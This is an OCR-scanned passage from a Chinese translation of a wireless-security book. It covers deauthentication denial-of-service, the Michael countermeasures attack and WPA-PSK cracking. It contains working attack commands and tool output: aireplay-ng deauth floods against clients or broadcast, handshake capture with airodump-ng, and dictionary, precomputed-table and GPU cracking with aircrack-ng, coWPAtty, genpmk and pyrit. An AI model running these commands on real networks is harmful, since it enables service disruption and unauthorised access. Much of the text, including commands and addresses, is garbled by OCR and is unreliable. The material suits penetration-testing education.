[1] 以 0x 开始 的 数据 表示 该 数据 是 以 十 六 进 制 表示 的 ， 所 以 0xAA、0xAA、0x03 所 表示 的 值 用 十 进 制 表示 为 : 170、170、3。 


译 者 注 


3.6 ”攻击 无 线 网 络 的 可 用 性 


本 节 包 含 两 种 技术 : 解除 认证 攻击 (deauth attack) 和 Michael 应 对 措施 。 实 际 上 有 比 这 多 得 多 的 攻击 方式 (如 许多 与 在 
AP 上 资源 荐 乏 相关 的 算法 ) ， 但 这 里 介绍 的 方法 就 足以 带 来 麻烦 。 


会 “解除 认证 的 拒绝 服务 攻击 


1 1 


你 用 于 踢 掉 网 络 用 户 并 恢复 其 SSID 的 一 些 相同 的 技术 将 被 反复 用 于 拒绝 他 们 访问 网 络 ， 这 一 点 也 不 奇怪 。 在 Linux 上 ， 你 只 
是 利用 以 前 使 用 过 的 相同 命令 ， 但 告诉 Aircrack-ng 继 续 做 下 去 。 例 如 ， 假设 你 正 上 采 上 一 个 特定 的 客户 问 00:23:6C:98:7C:7C， 其 
BSSID 是 : 00:1F:90:F2:D2:DB， 你 执行 下 列 操作 : 


(2:~)#iwconfig mon0 channel 6 
(:~)#alireplay-ng --deauth 0 -a QO:1lFE:90:FZ:D2:DE -ee O023:6C:98:7C: TC mond 


或 者 ， 你 也 可 以 指定 广播 地 址 ， 在 信号 覆 蘑 沁 围 内 的 网 络 上 拒绝 访问 任何 人 : 
(:~)# aireplay-ng --deauth 0 -a 00:1F:90:F2:D2:DB 一 FESFESFRE:EFESEFE:EF ‘MO 
想 要 利用 解除 认证 行动 的 Mac 用 户 ， 只 需要 将 其 功能 变 成 KisMAC 的 一 部 分 。KisMAC 将 通过 上 默认 的 方式 


(Kismac|Deauthenticate (解除 认证 ) 解除 对 广播 地 址 的 认证 。 


一 个 解除 认证 的 洪水 算法 中 是 使 附近 的 任何 客户 端的 网 络 通 信和 量 都 为 零 的 一 种 简单 而 有 效 的 方法 。 这 种 攻击 可 能 会 哄骗 受害 
人 脱离 企业 的 安全 网 络 ， 转 而 使 用 不 同 的 、 安 全 性 较 低 的 网 络 。 


人 @ 解除 认证 洪水 算法 的 应 对 措施 


当 一 个 破烂 房间 中 的 微 流 炉 可 以 使 你 的 无 线 网 络 次 痪 时 ， 那 么 软件 能 够 做 到 的 残 不 是 很 多 了 。 一 个 无 线 入 侵 检 测 系统 可 以 检 
测 到 这 种 攻击 时 ， 它 在 阻止 攻击 上 也 无 能 为 力 。 有 些 客户 端 驱 动 程序 似乎 正在 忽略 广播 解除 认证 的 帧 ， 这 是 一 个 合理 的 解决 办 
法 。 在 未 来 ， 解 除 认证 数据 包 将 在 802.11 下 被 授权 ， 但 当 这 种 事情 友 生 时 ， 攻 击 者 可 以 调动 大 量 其 他 拒绝 服务 (Denial-of- 
Service，DoS) 攻击 者 。 不 舞 的 是 ， 即 使 是 最 安全 的 网 络 ， 也 存在 可 预见 的 、 将 来 容易 受到 这 样 的 DoS 攻 击 的 脆弱 点。 


@ Michael 应 对 措施 
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当 |EEE 正 在 设计 临时 密 钥 完整 性 协议 (Temporal Key Integrity Protocol，TKIP) 时 (该 协议 被 WPA 所 采用 ) ， 他 们 不 得 
不 想 出 一 个 可 以 用 来 确保 数据 包 不 被 攻击 者 修改 的 算法 。WEP 试 图 使 用 ICV， 但 它 对 于 主动 攻击 是 无 效 的 。 新 的 算法 称 
为 Michael， 它 在 数据 包 中 创建 的 这 个 字段 称 为 消息 完整 性 检查 (Message Integrity Check，MIC) 。 


Michael 不 得 不 运行 在 更 老 的 、 基 于 WEP 的 硬件 上 ， 因 此 其 作用 非常 有 限 。 使 用 Michael 的 网 络 验 证 数据 包 的 完整 性 ， 也 不 
得 不 包括 应 对 措施 。 每 当 每 秒 有 超过 两 次 以 上 的 MIC 检 查 失 败 友 生 ， 这 些 应 对 措施 融会 家 执行 ，AP 解 除 所 有 用 户 的 认证 ， 并 衣 
使 他 们 重新 输入 。AP 还 需要 友 动 一 分 钟 的 广播 停止 。 一 个 有 趣 的 结果 是 ， 客 户 需 要 让 AP 知道 一 个 MIC 检 查 失 败 。 


如 果 攻 击 者 在 每 分 钟 只 有 两 个 数据 包 的 前 提 下 ， 能 够 导致 MIC 检 查 失 败 ， 那 么 她 就 能 够 有 效 地 对 AP 上 的 每 一 个 人 破坏 服 
务 。 这 个 攻击 比 其 他 第 2 层 的 拒绝 服务 DoS 攻 击 具有 了 明显 的 优势 ， 因 为 它 只 需要 维护 几 个 数据 包 ， 使 得 确定 攻击 者 的 地 理 位 置 变 
得 更 加 困难 。 


一 个 概念 验证 工具 已 在 Finn Halvorsen 的 硕士 论文 ( “IEEE 802.11i 的 TKIP 加 密 分 析 ”) 中 发 布 ， 该 工具 是 关于 一 个 每 分 钟 
产生 的 两 个 MIC 失 败 的 概念 验证 工具 。 该 功能 正在 合并 到 tkiptun-ng (Aircrack-ng 的 一 部 分 ) 中 ， 但 它 是 目前 很 不 稳定 。 当 你 
阅读 本 书 的 时 候 ， 该 攻击 可 能 已 经 被 并 入 到 tkiptun-ng 中 ， 最 好 的 验证 办 法 是 从 最 新 的 Aircrack-ng 的 svn 辐 地 址 中 下 载 并 编译 
链接 成 tkiptun-ng 二 进 制 文件 ， 然 后 看 是 否 已 集成 进去 。 


@ 访 逢 Michael 应 对 措施 


当 更 新 由 CCMP 提 供 的 基于 AES 的 加 密 算 法 的 时 候 ，TKIP 最 初 的 目的 是 设计 一 个 “头痛 医 头 ， 脚 痛 医 脚 ”的 解决 方案 。 对 
TKIP 的 声誉 方面 ， 在 被 友 现 遭 到 重创 之 前 ， 它 比 它 所 标榜 的 5 年 寿命 还 更 长 久 。 如 果 你 还 没有 升级 到 CCMP 提 供 的 最 新 版 ， 那 么 
仅 攻 击 者 的 能 力 融 是 唯一 需要 考虑 的 原因 ， 这 种 能 力 足以 通过 Michael 应 对 措施 ， 偷 偷 地 将 网 络 安全 性 级 别 降 低 。 


四 洪水 算法 是 当 莫 法 尼 用 时 ， 通 信 设 备 〈 如 路 由 器 ) 将 要 传送 的 信息 同时 向 所 有 的 路 由 设备 传送 ， 而 后 者 也 如 法 炮制 。 这 种 方 
式 会 因数 据 包 大 量 宛 余 而 占用 大 量 网 络 带 宫 ， 从 而 性 价 比 很 低 ; 但 只 要 有 一 种 可 能 ， 就 必然 能 在 最 短路 径 上 到 达 ， 从 而 速度 最 


快 。 适 合 于 战争 或 通信 设备 变化 很 快 环境 中 ， 并 且 事 务 很 紧急 的 情况 下 。 译 者 注 


[2] svn: 即 subversion 的 缩写 形式 ， 是 近年 来 崛起 的 版 本 管理 工具 。 目 前 ， 很 多 开源 软件 都 使 用 svn 作 为 代码 版 本 管理 软件 。 一 
译 者 注 
3.7 ”本章 小 结 


SSID 隐 藏 和 


本 章 泣 蘑 了 无 数 针 对 WEP 保 护 的 网 络 的 攻击 。 它 还 涉及 绕 过 通常 部 署 人 在 SOHO 网 络 上 其 他 安全 功能 的 万 法 
MAC 过 滤 的 。 基 本 的 拒绝 服务 DoS 技 术 也 包括 在 内 。 


第 4 草 ”攻击 WPA 保 护 下 的 802.11 网 络 


WPA/WPA2 大 大 提高 了 无 线 网 络 的 安全 性 ; 然而， 额外 保护 市 来 的 代价 是 协议 复杂 性 的 提高 。 本 书 前 言 对 WPA 进 行 了 简要 
的 介绍 ， 使 对 WPA 基 础 若 识 不 熟悉 的 读者 了 解 它 的 背景 资料 ， 本 章 的 重点 是 介绍 当前 已 知 的 WPA 攻 击 方式 。 


虽然 WPA 的 部 署 考虑 到 了 安全 性 ， 但 仍 存在 我 们 可 以 充分 利用 的 目 身 缺陷 。 在 较 高 的 层次 ，WPA 攻 击 可 以 分 为 两 类 : 对 身 
份 认证 的 攻击 和 对 加 密 的 攻击 。 身 份 认证 的 攻击 是 最 常见 的 并 直接 访问 无 线 网 络 ， 当 攻击 WPA-PSK 认 证 系统 的 时 候 ， 攻 击 者 也 
有 解密 /加 密 通 信 流 量 的 能 力 ， 因 为 PMK 已 被 破解 。 对 加 密 的 攻击 只 是 针对 WPA 网 络 ， 这 种 攻击 只 提供 对 来 往 数 据 包 的 解密 /加 
密 的 能 力 ， 而 不 允许 攻击 者 作为 一 个 合法 的 用 户 而 完全 加 入 网 络 后 再 实施 攻击 。 


4.1 破解 身份 认证 : WPA-PSK 


今天 仍 使 用 的 许多 WPA 部 署 利用 了 WPA-PSK 认 证 ， 也 称 为 WPA 个 人 版 (WPA-Personal) 。 这 种 机 制 是 利用 网 络 上 所 有 设 
备 中 公共 的 一 个 共享 的 秘密 密 钥 作 为 认证 的 。 虽 然 与 这 个 万 法 类 似 的 密 钥 导 出 浮 数 使 用 企业 认证 模式 ,但 WPA 部 署 方法 容易 受 
到 削弱 无 线 网 络 部 署 整体 安全 性 的 许多 攻击 的 影响 。 使 用 WPA 预 共享 密 钥 方法 进行 认证 的 详细 内 容 请 参阅 第 1 章 。 


力 ” 获 得 四 次 握手 


如 图 4-1 所 示 ， 四 次 握手 允许 客户 端 和 和 AP 协商 密 钥 用 于 对 无 线 传送 的 流量 进行 加 密 。 如 果 要 破解 这 个 密 钥 ， 需 要 先 获 得 
SSID、 由 AP 友 送 的 A-nonce、 由 客户 痛 皮 送 的 9-nonce、 客 户 闯 的 MAC 地 址 、AP 疾 的 MAC 地 址 和 一 个 用 于 验证 的 MIC， 除 了 
SSID 之 外 ， 所 有 其 他 值 都 可 以 在 四 次 握手 (four-way handshake) 中 找到 。 由 于 它们 的 值 在 数据 帧 的 传送 中 有 时 是 重复 出 现 
的 ， 所 以 实际 上 并 不 需要 完整 的 4 个 数据 帧 才能 成 功 地 破解 密 钥 。 这 在 有 时 我 们 不 小 心 错过 了 握手 的 一 部 分 (例如 ， 由 于 信道 跳 
频 ) 时 是 有 用 的 。 一 个 完整 的 四 次 握手 数据 包 捕 获 过 程 如 图 4-1 所 示 。 


客户 端 接 入 点 


密码 短语 (PSK) 密码 短语 (PSK) 


， ， 


PEMRE=PBKRDF |( 窗 码 短 语 ， PMEK=PBKDF( 窗 友 短 语 ， 
SSID，ssid 长 度 ，4096，256) SSID，ssid 长 度 ，4096，256) 


， 


256 位 成 对 主 密 256 位 成 对 主 窗 
衣 (PME) 钥 (PME) 


检查 MIC 


已 安装 窗 钥 ，MIC__ 
安安 密 钥 ， 开 始 “曹安 装 密 钥 ， 开 始 


图 4-1 WPA 的 四 次 握手 
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hackmeup-wpa-pak.cap=03.cap = Wireshark 
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Fila: "hackmeup=-wWpa=psk,cap=03.cap" 2 


被 动 嗅 探 


通过 被 动 嗅 探 获得 握手 无 需 与 目标 网 络 进行 交互 ， 这 是 迄今 
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Profile: Default 


为 止 最 为 隐蔽 的 方法 。 因 为 


个 客 尸 端 连接 某 个 网 络 


Pad 


是 一 个 相当 音 志 的 现象 ， 我 们 要 做 的 融 是 耐心 地 等 待 ， 如 果 我 们 在 正确 的 时 间 、 正 确 的 渠道 上 上， 那么 我 们 残 能 捕获 到 握手 。 这 个 
简单 的 过 程 ， 可 以 通过 使 用 任意 的 符合 802.11 标 准 的 无 线 噢 探 器 来 实现 。Aircrack-ng 套 件 中 的 airodump- 
ng (http://www.aircrack-ng.org) 是 一 个 简单 的 、 轻 量 级 的 响 探 器 ， 它 在 这 种 情况 下 特别 有 用 ， 因 为 它 在 我 们 成 功 地 捕获 到 


一 次 握手 时 及 时 知道 我 们 。 


当 运 行 airodump-ng 时 ， 我们 需要 确保 我 们 的 网 卡 工作 在 监控 模式 ， 锁 定 到 特定 的 信道 ， 并 且 通 过 该 网 卡 能 将 嗅 探 到 的 数 
据 保 存 到 一 个 文件 中 。 还 需要 通过 指定 一 个 BSSID 过 滤 (通过 使 用 -bssidoption 参 数 ) 来 锁定 一 个 特定 的 AP， 但 在 这 种 情 ) 


下 ,我 们 将 只 能 保存 馈 拭 定 的 蛙 一 信道 数据 。 


# alirmon—ng stop atho 


Interface Chipset Driver 

W110 Atheros madwifi—ng 

ethl Broadcom bocmAd3xx 

ath Atherose madwifi—ng VAP (parent: wifi0) (VAP destroved) 


# alrmon—ng start wifi0 


Interface Chipset Driver 

W110 Atheros madw1ifi—ng 

ethi Broadcom bocm43xx 

athu Atheros madwifi-ng VAP (parent: wifi0) (monitor 
mode enabled) 

# airodump-ng --channel 6 --write hackmeup athno 


前 两 个 命令 将 设置 Atheros 网 卡 为 监控 模式 ， 最 后 一 个 命令 实际 上 做 的 是 不 好 的 工作 。 将 网 卡 锁定 到 AP 正 在 传输 的 信道 ， 在 
这 个 例子 中 是 6 号 信道 ( 即 参 数 --channel 6) ， 保 存 所 有 的 数据 到 一 个 文件 中 ， 并 指定 该 文件 名 的 前 缀 是 hackmeup ( 即 参 数 -- 
write hackmeup) ， 指 明 将 用 来 噢 探 的 接口 是 ath0 上 〈 即 逻辑 上 的 第 一 个 网 卡 。 一 一 谋 者 注 ) 。 记 住 ， 如 果 使 用 不 同 的 心 片 组 
或 驱动 程序 ， 你 的 界面 可 能 会 有 所 不 同 。 


你 会 注意 到 在 处 理 截 图 右上 和 角 的 位 置 ，airodump-ng 通 知 我 们 一 个 WPA 握 手 已 被 捕获 到 。 


主动 攻击 “有 时 失去 耐心 反而 能 得 到 最 好 的 ， 我 们 告 诚 自己 与 其 等 待 周围 一 个 新 的 用 户 的 连接 ， 不 如 找 更 好 的 事情 去 做 ， 
就 是 主动 攻击 在 获得 握手 操作 上 能 派 上 用 场 的 时 候 。 为 什么 要 等 待 周围 的 用 户主 动 连接 ， 如 果 我 们 踢 一 个 用 户 下 线 ， 然 后 看 着 他 
重新 连接 不 就 行 了 吗 ? 我 们 可 以 使 用 任何 802.11 拒 绝 服 务 攻击 踢 一 个 用 户 下 线 ， 其 中 ， 最 流行 的 是 解除 认证 攻击 
(deauthentication attack) 。 第 一 步 是 运行 被 动 嗅 探 器 (如 刚才 所 描述 的 操作 ) ， 然 后 在 同一 系统 上 的 一 个 新 窗口 中 ， 
解除 认证 攻击 程序 ， 以 便 我 们 的 嗅 探 器 可 以 既 捕获 攻击 ， 又 能 捕获 客户 端 重新 连接 。 有 许多 工具 可 用 于 发 动 解除 认证 攻击 ， 在 这 
个 例子 中 ， 我 们 将 使 用 aireplay-ng (Aircrack-ng 套 件 中 的 另 一 个 工具 ) 。 


非 : aireplay-ng ~-deauth 10 -a O021:29:9646:33 -cc O00:15:6D:54:EL:A 二 上 0 
Lina 3 ting for beacon iframe i 00:21:29:96:46:93) on channel 6 
11252239 Sending 64 directed DeAuth. STMAC: [00:]5:6D:54:El]:47] [169|128 ACKs|]| 
11252254 Sending 64 directed DeAuth. STMAC: [00:]5:6D:54:El]:41] [414|344 ACKs]| 
ll:52:52 Sending 64 directed DeAuth. STMAC: [OO0:1]5:6D: S54:EL: 47] [261|193 ACKS| 


Shell - Konsole 


CH 6 ][ Elapsed: 4 s ][ 2009-11-04 11:45 ][ WPA handshake: 00:21:29:96:46:93 


BSSID PWR RXQ Beacons bh CH MB ENC CIPHER AUTH ESSID 
60:21:29:96:46:93 45 106 55 210 101 6 54 WPA2 CCMP PSK HackMeUp 
BSSID STATION PWR Rate Lost Packets Probes 


00:21:;29:96:46:93 00:15:6D:54:El:47 39 54- 上 1 410 


需要 强制 客户 端 重新 连接 的 解除 认证 帧 的 数量 可 能 会 有 所 不 同 ， 有 时 只 要 1 个 就 足够 ， 而 有 时 则 需要 高 达 25 个 。 我 们 已 经 指 
定 为 10 个 (参数 中 -deauth 10) 。aireplay-ng 会 在 两 个 方向 上 发 送 解除 认证 帧 : 从 AP (参数 中 的 -a 00:12:34:56:78:90) 到 客 
户 端 (参数 中 的 -c 00:90:78:56:34:12) ， 反 之 亦 然 。 攻 击 完 成 后 ， 我 们 稍 等 1 秒 钟 ， 然 后 检查 嗅 探 器 中 的 握手 。 如 果 一 切 顺利 ， 
我 们 可 以 继续 发 动 暴力 攻击 ! 如 果 没有 捕获 到 握手 数据 包 ， 检 查 BSSID 和 客户 端的 MAC 地 址 是 否 正确 ， 然 后 增加 解除 认证 帧 的 
数量 ， 再 重新 试 试 。 


NI17/ 
@” 


己 许 多 攻击 WPA 的 认证 攻击 一 样 ， 攻 击 WPA-PSK 可 以 归结 为 脱 机 暴力 攻击 。WPA-PSK 特 别 具 有 挑战 性 ， 因 为 作为 PSK 的 
字符 集 可 以 是 8~63 个 可 打印 的 ASCIl 字 符 ， 在 被 用 于 PMK 之 前 将 所 选择 的 密 钥 短 语 散 列 4096 次 。 这 大 大 增加 了 暴力 破解 的 过 
程 ， 因 此 ， 如 果 目 标 网 络 使 用 复杂 的 PSK， 你 会 友 现 你 目 己 化 了 大 量 的 时 间 其 实 一 直人 在 原 地 蹈 步 。 


既然 我 们 已 经 使 用 了 Aircrack-ng 套 件 ， 那 么 唯一 自然 的 事 惑 是 继续 用 跟 在 套件 名 字 Aircrack-ng 后 的 工 
具 来 破解 密 钥 与 大 多 数 WPA-PSK 破 解 工 具 一 样 ，Aircrack-ng 也 需要 一 个 捕获 文件 ， 文 件 中 至 少 包 含 四 次 握手 所 对 应 的 4 个 数据 
帧 中 的 两 个 。 使 用 Aircrack-ng 非 单 简单 : 


# aircrack-ng -WwW wordlist.txt hackmeup-01.cap 


沿用 前 面 的 例子 ， 我 们 将 指定 一 个 字典 文件 (参数 中 的 -w wordlist.txt) ， 以 及 一 个 捕获 文件 (参数 中 的 hackmeup- 
01.cap) 。 如 果 附近 有 多 个 AP， 你 可 能 还 必须 提供 对 应 的 目标 BSSID 的 编号 ， 该 BSSID 位 于 由 Aircrack-ng 提 供 的 列表 中 ( 当 执 
行 完 上 述 命令 后 ) 。 当 列表 显示 出 来 后 ， 它 也 将 定义 哪些 BSSID 被 发 现 ， 握 手 是 否 被 抓获 或 WEP IV 的 数量 。 最 后 ，Aircrack-ng 
将 继续 进行 暴力 攻击 ， 并 试图 友 现 的 预 共享 密 钥 。 


shell = Konsole 


AlLrcrack-ng Wh 
21] 24876 keys tested (175 . 
KEY FOUND! [ psK-eLecone ] 
Master Key : 8D 5A 2C 6F C5 78 FO TC | 
29 OF 8A D9 19 57 26 99 
Transient Key : 15 BA 07 A5 7C A9 B5 25 11 
昌 18 11 8A Ey AD AF AQ 


BS YE 1D = 
BB 3T 30 D9 FB OA Al 


EAPOL HMAC : F8 B9 77 8A 11 37 D9 E4 JE 27 E) 


虽然 Aircrack-ng 是 一 个 功能 很 强 的 工具 ， 但 它 有 一 定 的 局 限 性 。 一 个 功能 更 强 的 WPA-PSK 破 解 工具 玖 是 
coWPAtty， 即 Aircrack-ng 的 前 身 。coWPAtty 的 发明 者 是 Joshua Wright (http://www.willhackforsushi.com/? 
page id=50) ， 它 具备 一 个 好 工具 所 应 具有 的 、 所 有 功能 。coWPAtty 至 少 需要 四 次 握手 中 的 第 一 、 二 两 帧 或 第 二 、 三 两 帧 。 
使 用 coWPAtty 进 行 字 典 攻击 是 非常 简单 的 : 


# cowpatty -f wordlist.txt -s HackMeUp -r hackmeup-01.cap -2 


cowpatty 4.6 一 WPA-PSEK dictionary attack. <Jwrightahasborg.com> 


collected all necessary data to mount crack against WPAZ2/PSEK passphrase. 
Starting dictionary attack. Please be patient. 
key no. 1000: ambjvalently 


key no. 200U: attendance 


key no. 23000: thundered 


key no. 24000; unsurprisingly 


seconds: 107.33 passphrases/second 


我 们 指定 字典 文件 (参数 -f wordlist.txt) 、 目 标 网 络 的 SSID (参数 -s HackMeUp) 和 我 们 的 捕获 文件 (参数 -r 
hackmeup-01.cap) 。 最 后 一 个 参数 -2 是 指使 用 不 严格 模式 (nonstrict mode) ， 当 我 们 提供 了 一 次 捕获 合 有 少 于 四 次 握手 所 
有 四 个 帧 时 ， 这 种 模式 是 需要 的 。 一 般 来 说 ， 当 捕获 数据 无 论 是 什么 都 是 有 目的 时 ， 不 严格 模式 是 一 个 不 错 的 选择 。 


coWPAtty 的 一 个 不 错 的 功能 是 : 它 可 以 从 标准 输入 设备 〈( 即 stdin 设 备 ， 通 单 是 键盘 。 一 一 译 者 注 ) 接收 一 个 密码 列表 。 
此 功能 非 音 强 大 的 ， 因 为 可 以 将 它 与 字 排 询 工 具 相 结合 ， 如 John the Ripper 发 现 的 字 排 列 工具 
(http://www.openwall.com/john/) (简明 的 输出 ) : 


# John 一-WCOITQLLSt=WoId11LSst .ttEXL 一 -TULesS 一 -StQout cowpatty -f 一 -5 


HackMeUp -IT hackmeup-01.cap -2 
cowpatty 4.6 - WPA-PSK dictionary attack. Jwrightadhasborg.com 
Collected all necessary data to mount crack adalnst WPA2/PSK passphrase. 


rting dictionary attack. Please be patient. 


Using STDIN for words. 
Key nO. 1000: 04151978 
Key nO. 2000:; 1l190000thumbs 
OO. 994000: zwelstue 
no. 3993000: zyuutatu 


The PSK is "psk-elecOne". 


9395760 passphrases tested ijn 4154.91 seconds: 108.66 passphrases/second 


这 里 ， 我 们 输入 字典 文件 ， 并 通过 John the Ripper 的 规则 运行 它 ， 然 后 重 定向 输出 到 coWPAtty， 这 样 CoWPAtty 束 从 标准 
输入 设备 stdin (参数 中 的 -f-) 中 读 取 到 密码 短语 。 同 样 ，Aircrack-ng 通 过 一 个 连 字 符 输 入 到 wordlist 字 典 的 选项 (例如 参数 中 
的 -w-) ， 也 将 采取 从 标准 输入 设备 中 接收 输入 。 


和 鸭 ” 光 谴 破解 


里 然 coWPAtty 和 Aircrack-ng 是 执行 相同 功能 的 两 个 工具 ， 但 它们 的 写 操 作 和 优化 算法 是 不 同 的 ， 这 最 终 影响 了 破解 预 共 
享 密 钥 的 速度 。 例 如 ， 一 个 标准 的 Intel Core2 Duo coWPAtty 4.6 的 测试 速度 是 大 约 110 密 码 短语 / 秒 ， 而 Aircrack-ng 的 测试 速 
度 为 大 约 175 密 码 短语 / 秒 。 你 会 注意 到 ， 两 者 的 速率 都 相当 缓慢 ， 特 别 是 当 你 考虑 到 整个 密 钥 空间 的 时 候 。 让 我 们 看 看 加 快 这 
一 进程 的 几 种 方法 。 


预 乞 计 算 的 散 列 表 “暴力 破解 工具 的 工作 原理 是 通过 取 一 个 明文 值 〈( 例 如， 通过 猜测 ) ， 对 它 进行 加 密 ， 然 后 将 加 密 后 的 值 
与 捕获 到 的 密码 加 密 散 列 值 进行 比较 。 如 果 比 较 失 败 ， 说 明之 前 的 猜测 是 错误 的 ， 则 再 换 下 一 个 猜测 值 反 复 进行 上 述 过 程 。 大 多 
数 密集 型 处 理 器 以 及 这 类 处 理 器 的 耗 时 都 化 在 了 对 猜测 的 加 密 


预先 计算 的 散 列 表 是 由 猜测 加 密 后 的 密 文 组 成 的 。 有 了 预先 计算 的 散 列 表 ， 破 解 工 具 只 是 读 取 预先 计算 的 散 列 表 ， 然 后 与 密 
码 散 列 后 的 值 进行 比较 。 如 果 它 们 匹配 ， 那 么 程序 丈 在 预先 计算 的 散 列 表 中 查找 已 定义 的 明文 猜测 ， 并 将 它 提供 给 用 尸 。 预 先 计 
算 的 散 列 表 是 由 一 个 或 多 个 人 生成 和 友 布 ， 所 以 最 终 用 尸 从 来 不 必 担 心 花 费 时 间 生 成 散 列 表 。 另 外 ， 如 果 我 们 经 常 需 要 破解 一 个 
特定 的 散 列 类 型 ， 要 为 自己 创造 一 个 预计 算 散 列表 。 因 为 可 以 减少 或 完全 消除 暴力 破解 过 程 中 的 加 密 部 分 ， 极 大 地 提高 破解 密码 
散 列 所 花费 的 时 | 间 。 预 先 计算 散 列 表 的 缺点 是 : 表 的 内 容 可 能 会 非常 大 ， 从 而 难于 传输 或 存储 。 


当 涉 及 散 列表 时 ，WPA-PSk 特 别 棘 手 ， 因 为 PMK 不 仅 是 预 共享 密 钥 的 散 列 ， 而 且 也 是 SSID 的 散 列 。 这 意味 着 ， 即 使 两 个 不 
同 的 SSID 的 网 络 具有 相同 的 预 共 享 密 铀 ， 但 PMK 会 有 所 不 同 。 因 此 ，WPA-PSK 网 络 的 预计 算 散 列表 的 唯一 作用 就 是 : 你 为 了 一 
个 普通 的 SSID 而 生成 该 表 ， 或 者 你 希望 经 常 遇 到 该 表 。 


尽管 如 此 ，Church of Wifi (http://www.churchofwifi.org/) 和 David Hulton 制 作 了 最 前 的 1000 SSID 和 一 个 高 达 100 万 
字 的 密码 列表 ， 然 后 创建 了 40G 大 小 的 预先 计算 的 散 列 表 ! 这 些 都 可 以 在 http://rainbowtables.shmoo.com/ 上 找到 。 它 们 都 是 
用 coWPAtty 的 配套 工具 genpmk 所 生成 。 


如 果 我 们 想 创建 自己 的 散 列 表 ， 过 程 是 很 容易 的 ， 首 先 ， 用 genpmk 生 成 表 : 


# genpmk -f wordlist -d wordlist.genpmk -5 HackMeUp 

genpmk 1.1 - WPA-PSK precomputation attack. <Jwright@hasborg.com> 
File wordlist.genpmk does not exist, creating. 

key no. 1000: ambivalently 


my my 


Key no. 2000: attendance 


Key no. 23000: thundered 
Key no. 24000; unsurprisingly 


.30 seconds: 10i1.14 passphrases/second 
随 看 散 列 的 预先 计算 ,我 们 可 以 使 用 genpmk 的 散 列 表 破解 特定 的 SSID: 


# cowpatty -d wordlist.genpmk -r hackmeup-01.cap -ss HackMeUp -2 
cowpatty 4.6 - WPA-PSK dictionary attack. <Jjwright@hasborg.com> 


Collected all necessary data to mount crack against WPA2/PSK passphrase. 
starting dictionary attack. Please be patient. 

Key no. 10000: formalizations 

Key no. 20000: salvaging 

The PSK 1s "psSk-elecOne". 


24876 passphrases tested in 0.37 seconds: 67595.62 passphrases/second 


现场 可 编程 逻辑 | 阵列 ”现场 可 编程 逻辑 门 阵列 (Field-Programmable Gate Array，FPGA) 可 以 以 惊人 的 速度 定制 执行 
简单 任务 如 人 逻辑 运算 的 集成 电路 。 这 实现 了 它们 处 理 脱 机 暴力 攻击 加 密 过 程 的 想法 。 将 FPGA 用 于 密码 破解 的 先驱 之 一 是 David 
Hulton (又 名 h1kari) 。 事 实 上 ，Church of Wifi 的 预先 计算 散 列 实际 上 是 由 David Hulton 在 他 的 FPGA 和 群集 上 创建 的 。 
coWPAtty 和 其 他 各 种 工具 都 被 移植 天 了 FPGA 上 ， 并 且 这 些 工具 都 可 以 在 http://openciphers.sourceforge.net/oc/ 上 找到 |。 
David Hulton 所 设计 的 FPGA 可 以 从 http://www.picocomputing.com/ 上 购买 。FPGA 的 主要 缺点 是 其 价格 : 一 个 具有 最 基本 
功能 的 FPGA 的 价格 在 1000 美 元 左右 ， 该 型 号 的 运行 速度 是 每 秒 约 430 个 密码 短语 。 较 便宜 的 单元 模块 可 以 单独 使 用 ， 但 需要 对 
集成 电路 有 深入 的 了 解 才能 构建 到 系统 中 。 


图 形 处 理 单 元 ”图 形 处 理 音 元 (Graphical Processing Unit，GPU) 位 于 可 处 理 图 形 泻 染 的 视频 卡 的 处 理 器 中 。 在 现代 的 
视频 卡 中 ， 它 们 运行 非常 高 效 ， 在 执行 计算 任务 时 表示 极为 强大 。 我 知道 你 在 想 什么 : “有 比 执行 破解 密码 更 好 的 任务 吗 ? ”我 
的 想法 完全 正确 ! 通过 使 用 NVIDIA 的 计算 统一 设备 架构 (Compute Unified Device Architecture，CUDA) ，C 语 言 开 发 人 员 
可 以 卸载 视频 卡 的 任务 ， 然 后 用 图 形 处 理 单 元 执行 密码 破解 。 其 他 视频 卡 制 造 商 提供 了 与 他 们 的 GPU 交互 类 似 的 方法 ; 然 
而 ，NVIDIA 的 CUDA 技 术 是 最 早出 现 的 GPU 之 一 ， 并 因此 被 视 为 最 流行 的 ， 所 以 被 广泛 使 用 。 


pyrit (http://code.google.com/p/pyrit/) 是 一 个 开源 的 WPA-PSK 暴 力 破解 工具 ， 它 支持 各 种 各 样 的 架构 ， 最 重要 的 
是 ， 它 支持 CUDA 技 术 。pyrit 由 两 部 分 组 成 : 主 控 模 块 和 扩展 模块 。pyrit 的 基于 Python 的 主 控 模 块 提供 了 一 个 命令 行 组 件 ， 它 
处 理 一 系列 管理 任务 ， 并 且 支 持 CPU 的 破解 。 它 的 真正 的 力量 在 于 其 扩展 模块 ， 扩 展 模 块 支持 不 同 的 架构 。 可 以 调用 这 些 模 块 
轻松 地 使 用 Python 功能 ， 所 以 如 果 你 不 喜欢 这 种 调用 主 控 模 块 功能 的 方式 ， 你 可 以 编写 你 自己 的 功能 ! pyrit 也 支持 多 个 CPU 和 
GPU 的 模式 ; 将 它们 以 堆栈 方式 罗列 在 视频 卡 上 ， 可 以 产生 超 强 的 破解 能 力 。 要 使 用 pyrit， 首 先 要 创建 一 个 SSID: 


站 pyrit -e HackMeUp create essid 


Pyrit 0.2.4 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com 


3 distributed under the GNU General Public License V3 


Created ESSID ‘HackMeUp' 


接 下 来 ， 创 建 一 个 密码 数据 库 


# pyrit -f wordlist.txt import passwords 

Pyrit 0.2.4 (C) 2008, 20093 Lukas Lueg http://pyrit.googlecode.com 
This code is distributed under the GNU General Public License v3 
996360 lines read. Flushing buffters... 

All done. 


最 后 ， 反 动 暴力 攻击 : 


{ft pyrit -r hackmeup-0l.cap -e HackMeUp attack batch 

Pyrit 0.2.4 (C) 2008, 2009 Lukas Lueg http://pyrit.goo0glecode .com 
This code 13 distributed under the GNU General Public License v3 
Parsing file "hackmneup-01.cap7 (1/1)... 

J1638 packets (31698 802.1l1l-packets), 1 APs 


Picked Access—-Point 00:21:29:96:46:93 automatically... 
Attacking handshake with Station 00:15:6d:34:el:4i... 
Tried 995159 PMFKs so far (lO00.0%); 320033 FMKs Per second. 


Computed 1313.83 PMKs/s total. 


#1: ‘CUDA-Device #1 ‘GeForce GTX 280": 9486.3 PMKs/s (Qcc. 12.1%; RTT 0.4) 
42: "CEU-Core (SSE2)}"': 493.8 PMEKSs/s (Occ. 33.3%; RTT 1.0) 

